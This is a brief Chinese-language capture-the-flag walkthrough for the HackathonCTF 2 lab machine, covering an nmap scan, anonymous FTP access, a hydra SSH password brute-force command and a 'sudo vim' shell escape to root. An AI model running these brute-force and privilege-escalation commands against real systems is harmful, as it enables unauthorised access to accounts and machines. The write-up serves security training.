HackathonCTF 2

1.首先nmap扫描获得ip

2.扫描全端口并记录信息

nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 192.168.19.141

3.可以看到ftp上匿名用户可以得到flag1.txt和word.dir

4.那么接下来就是利用这个字典爆破ssh

5.还有一个80端口，目录扫描得到一个happy目录，查看源代码获取到用户名

6.hydra ssh爆破

hydra -l hackathonll -P word.dir -V -f -t 10 -s 7223 192.168.84.195 ssh  

7.得到密码成功登录

8.但是find / -name flag.txt 2>/dev/null 没有找到flag2.txt，那么只能通过提权获得查看权限

9.sudo -l查看当前有权限的命令

可以看到vim就在其中，那么就是vim提权

10.利用sudo vim获得root权限执行命令

sudo vim -c ':!/bin/bash'

11.成功获得root权限找到flag2.txt